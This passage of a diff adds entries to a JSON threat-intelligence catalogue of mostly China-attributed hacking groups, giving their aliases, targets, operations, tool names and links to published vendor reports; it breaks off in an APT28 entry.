"https://kc.mcafee.com/corporate/index?page=content&id=KB71150" + ], + "attck_id": "G0014", + "comment": null + }, + { + "country": "china", + "names": [ + "Nightshade Panda", + "APT9", + "FlowerLady" + ], + "targets": [ + "HK, US, SG, MY, JP, IN, KR, TH, TW - Aerospace, Agriculture, Construction, Energy, Healthcare, ,High Tech, Media, Transportation" + ], + "operations": [], + "description": null, + "tools": [ + "SOGU", + "VICEROY", + "GH0ST", + "XDOOR", + "SKINNYGENE", + "WETHEAD", + "PlugX", + "BIGJOLT", + "FUNRUN", + "VIPSH ELL", + "JIM A", + "HOMEUNIX", + "POISON IVY", + "PHOTO", + "ZXSHELL", + "Poison Ivy" + ], + "links": [ + "https://otx.alienvault.com/pulse/55bbc68e67db8c2d547ae393/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Nomad Panda" + ], + "targets": [ + "Central Asian nations" + ], + "operations": [], + "description": null, + "tools": [ + "8.t exploit document builder" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Pale Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "PlugX" + ], + "links": [ + "http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf" + ], + "attck_id": null, + "comment": "Mentioned in 2014 Crowdstrike Global Threat Intel Report pg 22" + }, + { + "country": "china", + "names": [ + "Pirate Panda", + "KeyBoys" + ], + "targets": [], + "operations": [], + "description": "Southeast Asia", + "tools": [], + "links": [ + "http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/", + "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/", + "https://blogs.cisco.com/security/scope-of-keyboy-targeted-malware-attacks", + "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", + "https://citizenlab.ca/2016/11/parliament-keyboy/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Poisonous Panda" + ], + "targets": [ + "Energy technology, G20, NGOs, Dissident Groups" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf" + ], + "attck_id": null, + "comment": "Listed slide 4" + }, + { + "country": "china", + "names": [ + "Predator Panda" + ], + "targets": [ + "Southeast Asia" + ], + "operations": [], + "description": null, + "tools": [ + "PlugX" + ], + "links": [ + "http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf" + ], + "attck_id": null, + "comment": "Mentioned pg 22 & 42" + }, + { + "country": "china", + "names": [ + "Radio Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Sabre Panda" + ], + "targets": [ + "Umbrella Revolution" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf" + ], + "attck_id": null, + "comment": "Listed in 2014 Global Threat Report (pg 9) - observed in Umbrella Revolution related activity (pg 28)" + }, + { + "country": "china", + "names": [ + "Spicy Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf" + ], + "attck_id": null, + "comment": "Listed in 2014 Global Threat Report - no more details pg 9" + }, + { + "country": "china", + "names": [ + "BRONZE RIVERSIDE", + "Red Apollo, CVNX, POTASSIUM, Cloud Hopper, Hogfish, TA429, Cicada", + "Stone Panda", + "APT10", + "MenuPass Team" + ], + "targets": [ + "Healthcare; Pharma, Defense, Aerospace, Government, MSP, " + ], + "operations": [ + "Dust Storm", + "ChessMaster", + "Cloud Hopper" + ], + "description": "Data exfil over common TCP services (RDP, HTTPS)", + "tools": [ + "Quasar", + "Trochilus", + "UPPERCUT (aka ANEL)", + "ChChes", + "RedLeaves", + "CobaltStrike", + "StoneNetLoader", + "PlugX", + "IEChecker", + "EvilGrab", + "Poison Ivy" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks", + "http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem", + "https://www.cylance.com/hubfs/2015_cylance_website/assets/operation-dust-storm/Op_Dust_Storm_Report.pdf", + "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", + "https://blog.ensilo.com/uncovering-new-activity-by-apt10", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", + "https://threatpost.com/poison-ivy-rat-spotted-in-three-new-attacks/102022/", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://www.isightpartners.com/2016/02/threatscape-media-highlights-update-week-february-24th/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage" + ], + "attck_id": "G0045", + "comment": "Profile slide 13 & 14" + }, + { + "country": "china", + "names": [ + "admin@338", + "338 Team", + "Temper Panda", + "Admin338", + "Team338" + ], + "targets": [ + "Target Gov + Military, DIB, Finiancial/Think Tanks, Telco, Academia, Religious organisations" + ], + "operations": [ + "admin@338" + ], + "description": null, + "tools": [ + "LOWBALL", + "BUBBLEWRAP", + "Poison Ivy", + "jRat" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" + ], + "attck_id": null, + "comment": "\u00e2\u0080\u009cPdPD\u00e2\u0080\u009d (50 64 50 44) marker for encrypted binaries" + }, + { + "country": "china", + "names": [ + "Test Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem" + ], + "attck_id": null, + "comment": "Listed slide 8" + }, + { + "country": "china", + "names": [ + "Toxic Panda" + ], + "targets": [ + "Dissident Groups" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf" + ], + "attck_id": null, + "comment": "Listed slide 4" + }, + { + "country": "china", + "names": [ + "Twisted Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Union Panda" + ], + "targets": [ + "Industrial companies" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf" + ], + "attck_id": null, + "comment": "Listed slide 4" + }, + { + "country": "china", + "names": [ + "Vicious Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://securelist.com/apt-trends-report-q2-2020/97937/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "APT20", + "Covert Grove", + "APT8", + "Violin Panda" + ], + "targets": [ + "Energy, Chemical Industry, Healthcare and Pharma" + ], + "operations": [ + "th3bug", + "Wocao" + ], + "description": null, + "tools": [ + "CANDYCLOG", + "CETTRA", + "COOKIECLOG", + "Poison Ivy", + "CAKELOG" + ], + "links": [ + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_nitro_attacks.pdf", + "http://www.slideshare.net/CrowdStrike/crowdcast-monthly-operationalizing-intelligence-34141777" + ], + "attck_id": null, + "comment": "Listed slide 12" + }, + { + "country": "china", + "names": [ + "Wet Panda" + ], + "targets": [ + "Energy " + ], + "operations": [], + "description": null, + "tools": [ + "PlugX" + ], + "links": [ + "http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf", + "http://www.slideshare.net/CrowdStrike/crowdcast-monthly-operationalizing-intelligence-34141777" + ], + "attck_id": null, + "comment": "Mentioned in 2014 Global Threat Report using PlugX (pg 22)" + }, + { + "country": "china", + "names": [ + "?" + ], + "targets": [ + "Tibetans, Hong Kong, Taiwanese interests and human rights workers, Uyghur Interests" + ], + "operations": [], + "description": "Active", + "tools": [ + "T9000", + "Agent.XST", + "Kivars", + "Grabber", + "PlugX", + "UP007", + "Gh0StRAT", + "SLServer" + ], + "links": [ + "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/", + "https://citizenlab.org/2016/04/between-hong-kong-and-burma/", + "http://pwc.blogs.com/cyber_security_updates/2016/03/taiwant-election-targetting.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "?" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://web.archive.org/web/20151217200415/https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "?" + ], + "targets": [ + "Afghan Government" + ], + "operations": [], + "description": "Watering Hole", + "tools": [], + "links": [ + "https://www.threatconnect.com/operation-poisoned-helmand/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "?", + "APT1?" + ], + "targets": [ + "USA" + ], + "operations": [ + "Titan Rain" + ], + "description": null, + "tools": [], + "links": [ + "https://www.zdnet.com/article/security-experts-lift-lid-on-chinese-hack-attacks/", + "http://web.archive.org/web/20081011233241/http://www.breitbart.com/news/2005/12/12/051212224756.jwmkvntb.html" + ], + "attck_id": null, + "comment": "web archive link to 12/12/2005 article about Titan Rain, ZDNet link dated 11/23/2005 is similar article" + }, + { + "country": "china", + "names": [ + "?", + "PLA Navy", + "APT4?", + "Maverick Panda", + "Sykipot" + ], + "targets": [ + "DIB (Defence Industrial Base) and other government organizations" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", + "https://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Links to Skyipot, Pitty Tiger, Comment Crew, Mirage", + "Calypso" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Calypso RAT", + "Byebe", + "PlugX", + "CMStar" + ], + "links": [ + "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", + "https://resources.malwarebytes.com/files/2020/04/200407-MWB-COVID-White-Paper_Final.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "KeyBoy", + "Tropic Trooper" + ], + "targets": [ + "Taiwan, High-Tech in Asia, Taiwanese Government, Fossil Fuel Provider, Taiwanese, Philippine, and Hong Kong targets, focusing on their government, healthcare, transportation, and high-tech industries" + ], + "operations": [], + "description": null, + "tools": [ + "PCShare", + "Yahoyah", + "Poison Ivy" + ], + "links": [ + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/" + ], + "attck_id": "G0081", + "comment": "Group based in Xiamen, in same area as PLA Navy. Likely a navy SIGINT TRB" + }, + { + "country": "china", + "names": [ + "APT41" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "ZxShell", + "LOWKEY", + "CRACKSHOT", + "SAGEHIRE", + "TERA", + "PHOTO", + "SOGU", + "PACMAN", + "LIFEBOAT", + "GEARSHIFT", + "LATELUNCH", + "NJRAT", + "HIGHNOON", + "WIDETONE", + "TIDYELF", + "HOTCHAI", + "WINTERLOVE", + "JUMPALL", + "POISONPLUG", + "POTROAST", + "ROCKBOOT", + "SWEETCANDLE", + "XDoor", + "Xmrig" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", + "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html", + "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html" + ], + "attck_id": "G0096", + "comment": "Overlap with BARIUM and Winnti" + }, + { + "country": "china", + "names": [ + "Earth Empusa", + "Poison Carp" + ], + "targets": [ + "This threat actor targets smartphones associated with Tibetan and Uyghur activists for espionage purposes." + ], + "operations": [], + "description": "Strategic web compromise (watering hole)", + "tools": [ + "Evil Eye", + "BeEF", + "ActionSpy", + "ScanBox" + ], + "links": [ + "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/", + "https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/", + "https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/", + "https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "AVIVORE" + ], + "targets": [ + "aerospace and defence industries in the UK and Europe" + ], + "operations": [], + "description": null, + "tools": [ + "Mimikatz", + "WmiExec", + "PlugX" + ], + "links": [ + "https://www.contextis.com/en/blog/avivore", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-CTI-005.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "APT-C-01", + "PoisonVine" + ], + "targets": [ + "government agencies, military individuals, research institutes, maritime agencies" + ], + "operations": [], + "description": null, + "tools": [ + "ZxShell", + "CVE-2012-0158", + "CVE-2017-8759", + "Kanbox RAT", + "CVE-2014-6352", + "Poison Ivy" + ], + "links": [ + "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-vine-climbing-over-great-firewall-longterm-attack-against-china/", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf", + "http://blogs.360.cn/post/APT_C_01_en.html", + "https://ti.qianxin.com/uploads/2018/09/20/6f8ad451646c9eda1f75c5d31f39f668.pdf", + "https://ti.qianxin.com/blog/articles/analysis-of-apt-c-01/", + "https://www.netscout.com/sites/default/files/2019-02/SECR_001_EN-1901%20-%20NETSCOUT%20Threat%20Intelligence%20Report%202H%202018.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "DarkUniverse" + ], + "targets": [ + "Tibet and Uyghur activists, Syria, Iran, Afghanistan, Tanzania, Ethiopia, Sudan, Russia, Belarus and the United Arab Emirates" + ], + "operations": [], + "description": "Spearphishing w/CVE-2013-0640 weaponized PDF", + "tools": [ + "ItaDuke" + ], + "links": [ + "https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/", + "https://www.alienvault.com/blogs/labs-research/latest-adobe-pdf-exploit-used-to-target-uyghur-and-tibetan-activists", + "https://securelist.com/new-uyghur-and-tibetan-themed-attacks-using-pdf-exploits/35465/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Taskmasters" + ], + "targets": [ + "Military, government, telecommunication, small businesses" + ], + "operations": [], + "description": null, + "tools": [ + "Scheduled Tasks", + "RemShell", + "Eternal Blue", + "404-Input-shell" + ], + "links": [ + "https://www.ptsecurity.com/ww-en/analytics/operation-taskmasters-2019/", + "https://blog.group-ib.com/task", + "https://www.youtube.com/watch?v=XYuclHsoQO4&feature=youtu.be" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Soft Cell", + "GALLIUM" + ], + "targets": [ + "Telecom" + ], + "operations": [], + "description": null, + "tools": [ + "PsExec", + "BlackMould", + "Netcat", + "Winrar", + "QuarkBandit", + "China Chopper", + "Htran", + "NBTScan", + "PoisonIvy" + ], + "links": [ + "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "RANCOR" + ], + "targets": [ + "South-East Asia" + ], + "operations": [], + "description": null, + "tools": [ + "Derusbi", + "Dudell", + "DDKONG Plugin", + "KHRAT Trojan" + ], + "links": [ + "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", + "https://meltx0r.github.io/tech/2019/09/11/rancor-apt.html", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://research.checkpoint.com/rancor-the-year-of-the-phish/" + ], + "attck_id": "G0075", + "comment": null + }, + { + "country": "china", + "names": [ + "ChinaZ" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Linux/UDPfker", + "Linux.BackDoor.Xnote.1", + "Linux/BillGates.Lite" + ], + "links": [ + "https://www.intezer.com/blog-chinese-apts-rising-ia-community-may-2019/", + "https://blog.malwaremustdie.org/2015/08/mmd-0039-2015-chinaz-made-new-malware.html", + "https://news.drweb.com/show/?i=9272&lng=en&c=5", + "https://blog.malwaremustdie.org/2016/10/mmd-0060-2016-linuxudpfker-and-chinaz.html", + "https://www.intezer.com/blog-chinaz-introduces-new-undetected-malware/", + "https://www.botconf.eu/wp-content/uploads/2014/12/2014-2.10-Chinese-Chicken-Multiplatform-DDoS-Botnets.pdf", + "https://www.intezer.com/blog-chinaz-relations/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Papa Bear", + "Pat/Patted Bear", + "Slap Bear", + "APT-C-37" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://mp.weixin.qq.com/s/lUtXwWjPVMHXfR6oLnXYhQ", + "https://zhuanlan.kanxue.com/article-8168.htm", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "APT-C-27", + "Goldmouse/Gold Mouse/Gold Rat" + ], + "targets": [ + "Middle East" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog.360totalsecurity.com/en/the-sample-analysis-of-apt-c-27s-recent-attack/", + "https://www.pbwcz.cz/Reporty/20180723_CSE_APT27_Syria_v1.pdf", + "https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Storm Cloud" + ], + "targets": [], + "operations": [ + "Holy Water" + ], + "description": "Strategic web compromise (watering hole)", + "tools": [ + "Godlike12", + "SweetAlerts" + ], + "links": [], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "TA410" + ], + "targets": [ + "utility providers across the U.S" + ], + "operations": [], + "description": null, + "tools": [ + "LookBack", + "FlowCloud" + ], + "links": [ + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "SixLittleMonkeys", + "Microcin" + ], + "targets": [ + "Central Asia, Russian military, Belarussia, Mongolia," + ], + "operations": [], + "description": null, + "tools": [ + "BYEBY", + "Microcin", + "Mikroceen" + ], + "links": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/", + "https://securelist.com/microcin-is-here/97353/", + "https://securelist.com/steganography-in-contemporary-cyberattacks/79276/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "UNC2640", + "UNC2639", + "Ant", + "HAFNIUM", + "UNC2643" + ], + "targets": [ + "Microsoft Exchange Server" + ], + "operations": [ + "Operation Exchange Marauder" + ], + "description": null, + "tools": [ + "Covenant", + "7-Zip", + "PowerCat", + "Procdump", + "Nishang" + ], + "links": [ + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Luminous Moth" + ], + "targets": [ + "South East Asia" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/apt-luminousmoth/103332/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Spiral" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "SolarWinds Orion API (CVE-2020-10148)", + "SUPERNOVA" + ], + "links": [ + "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Sparkling Goblin" + ], + "targets": [ + "Academic sectors in Macao, Hong Kong and Taiwan, A religious organization in Taiwan, A computer and electronics manufacturer in Taiwan, Government organizations in Southeast Asia, An e-commerce platform in South Korea, The education sector in Canada, Media companies in India, Bahrain, and the USA, A computer retail company based in the USA, Local government in the country of Georgia, Unidentified organizations in South Korea and Singapore, " + ], + "operations": [], + "description": null, + "tools": [ + "SideWalk", + "CROSSWALK" + ], + "links": [ + "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", + "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "BRONZE FLEETWOOD", + "APT5" + ], + "targets": [ + "Regional telecommunication providers, Asia-based employees of global telecommunications and tech firms, high-tech manufacturing, and military application technology." + ], + "operations": [], + "description": null, + "tools": [ + "TABCTENG", + "SHORTLEASH", + "HAZELNUT", + "LEOUNCIA", + "FULLSILO", + "DIRTYWORD", + "FREESWIM", + "PULLTAB", + "DANCEPARTY", + "HELLOTHEWORLD", + "HALFBACK", + "HIREDHELP", + "AURIGA", + "CYFREE", + "COOLWHIP", + "SHINYFUR", + "HAPPYSAD", + "SWEETCOLA", + "BIRDWORLD", + "TIGHTROPE", + "Poison Ivy", + "BRIGHTCYAN", + "BRIGHTCREST", + "ENCORE", + "GIF89A", + "BRIGHTCOMB", + "PUSHBACK", + "KEYFANG", + "SPIRITBOX", + "CLEANACT", + "PALEJAB", + "WINVAULT", + "LOWBID", + "PITCHFORK", + "TRUCKBED", + "NEDDYHORSE", + "SCREENBIND", + "WIDERIM", + "FARCRY" + ], + "links": [ + "https://www.fireeye.com/current-threats/apt-groups.html", + "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", + "https://www.bloomberg.com/news/features/2021-09-02/juniper-mystery-attacks-traced-to-pentagon-role-and-chinese-hackers" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "RedFoxtrot " + ], + "targets": [ + "South Asia Telecom & Defense" + ], + "operations": [], + "description": null, + "tools": [ + "ShadowPad", + "PlugX-Talisman", + "GUNTERS" + ], + "links": [ + "https://go.recordedfuture.com/redfoxtrot-insikt-report", + "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/", + "https://www.recordedfuture.com/redfoxtrot-china-pla-targets-bordering-asian-countries/", + "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "IronHusky" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "MysterySnail", + "CVE-2021-40449" + ], + "links": [ + "https://securelist.com/apt-trends-report-q1-2018/85280/https://securelist.com/apt-trends-report-q1-2018/85280/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Antlion" + ], + "targets": [ + "Financial Services in ROC (Taiwan)" + ], + "operations": [], + "description": null, + "tools": [ + "Xpack", + "EHAGBPSL", + "JpgRun", + "NetSessionEnum" + ], + "links": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "DEV-0322" + ], + "targets": [ + "US Defense Industrial Base, higher education, consulting services, and information technology sectors" + ], + "operations": [ + "TiltedTemple" + ], + "description": "Serv-u Secure FTP, Exploit ZOHO ManageEngine ADSelfService Plus", + "tools": [], + "links": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", + "https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/", + "https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Curious Gorge" + ], + "targets": [ + "government & military organizations in Ukraine, Russia, Kazakhstan, and Mongolia" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/", + "https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/" + ], + "attck_id": null, + "comment": "Subordinate to Strategic Support Force" + }, + { + "country": "china", + "names": [ + "Scarab" + ], + "targets": [ + "Russia, Ukraine" + ], + "operations": [], + "description": null, + "tools": [ + "", + "Trojan.Scieron", + "Scieron", + "Trojan.Scieron.B" + ], + "links": [ + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8bfa7311-fdd9-4f8d-b813-1ab6c9d2c363&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/", + "https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/", + "https://cert.gov.ua/article/38097", + "https://otx.alienvault.com/pulse/54c7e1e811d4085eb82e0598/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "TG-4127", + "SNAKEMACKEREL", + "APT28", + "Grizzly Steppe", + "Pawn Storm", + "Sednit", + "Strontium", + "Swallowtail", + "Sofacy", + "IRON TWILIGHT", + "Tsar Team", + "SIG40", + "Fancy Bear", + "Group 74" + ], + "targets": [ + "United States government" + ], + "operations": [ + "OpOlympics", + " Russian Doll", + "DNC Hack", + "Burisma", + "Bundestag", + "TV5 Monde \"Cyber Caliphate\"", + "EFF Attack" + ], + "description": null, + "tools": [ + "Sednit", + "LoJax", + "OLDBAIT", + "CORESHELL", + "Foozer", + "SeduUploader", + "Komplex", + "SOURFACE", + "XAgent", + "DealersChoice", + "Sedkit", + "XTunnel", + "Sedreco Dropper", + "CHOPSTICK", + "Winexe", + "Downdelph", + "DownRange", + "WinIDS", + "USBStealer", + "Sofacy", + "HideDrv (Rootkit)" + ], + "links": [ + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://apnews.com/3bca5267d4544508bb523fa0db462cb2?utm_campaign=SocialFlow&utm_source=Twitter&utm_medium=AP", + "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", + "https://aptnotes.malwareconfig.com/web/viewer.html?file=../APTnotes/2014/apt28.pdf", + "https://www.crowdstrike.com/blog/danger-close-fancy-bear-tracking-ukrainian-field-artillery-units/", + 